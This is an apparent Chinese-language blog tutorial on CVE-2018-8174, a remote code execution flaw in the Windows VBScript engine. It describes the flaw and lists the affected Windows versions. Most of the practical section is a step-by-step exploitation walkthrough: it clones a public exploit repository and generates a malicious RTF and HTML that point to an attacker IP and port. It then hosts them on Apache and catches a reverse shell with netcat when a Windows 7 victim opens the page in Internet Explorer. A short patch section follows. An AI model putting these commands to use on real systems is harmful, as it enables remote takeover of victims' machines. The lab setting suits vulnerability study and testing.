漏洞描述
VBScript引擎处理内存中对象的方式中存在一个远程执行代码漏洞。该漏洞可能以一种攻击者可以在当前用户的上下文中执行任意代码的方式来破坏内存。成功利用此漏洞的攻击者可以获得与当前用户相同的用户权限。如果当前用户使用管理用户权限登录,则成功利用此漏洞的攻击者可以控制受影响的系统。然后,攻击者可能会安装程序。查看,更改或删除数据;或创建具有完全用户权限的新帐户。
在基于Web的攻击情形中,攻击者可能拥有一个旨在通过Internet Explorer利用此漏洞的特制网站,然后诱使用户查看该网站。攻击者还可能在承载IE呈现引擎的应用程序或Microsoft Office文档中嵌入标记为“初始化安全”的ActiveX控件。攻击者还可能利用受感染的网站以及接受或托管用户提供的内容或广告的网站。这些网站可能包含可以利用此漏洞的特制内容。
影响版本
- Windows 7
- Windows Server 2012 R2
- Windows RT 8.1
- Windows Server 2008
- Windows Server 2012
- Windows 8.1
- Windows Server 2016
- Windows Server 2008 R2
- Windows 10
- Windows 10服务器。
漏洞检测
https://github.com/clark515/CVE_PoC/
下载好文件后,将html文件复制到我们的web服务器上,或目标机上。
当存在CVE-2018-8174漏洞的系统利用IE去访问htm文件时,将弹出计算器。
漏洞利用
攻击机:kali
目标机:windows 7
下载利用脚本到kali上
git clone https://github.com/Yt1g3r/CVE-2018-8174_EXP.git
进入文件,生成而已脚本:
cd CVE-2018-8174_EXP/
python CVE-2018-8174.py -u http://192.168.206.128/exploit.html -o exp.rtf -i 192.168.206.128 -p 4444
- -u:URL 地址,恶意 html 文件
- -o:生成文档
- -i:监听地址
- -p:监听端口
复制html文件到网站目录下
cp exploit.html /var/www/html/
cp exp.rtf /var/www/html/
打开apache2服务
service apache2 start
使用nc进行端口监听
nc -lvvp 4444
当目标使用ie浏览器访问我们构造好的html文件后,即可获取shell权限
http://192.168.206.128/exploit.html
攻击机nc监听上线:
漏洞修复
补丁地址:
https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8174
选择相对应的系统版本,例如我是 32 位 windows 7系统
下载好后直接运行即可
参考地址
https://www.freebuf.com/vuls/224379.html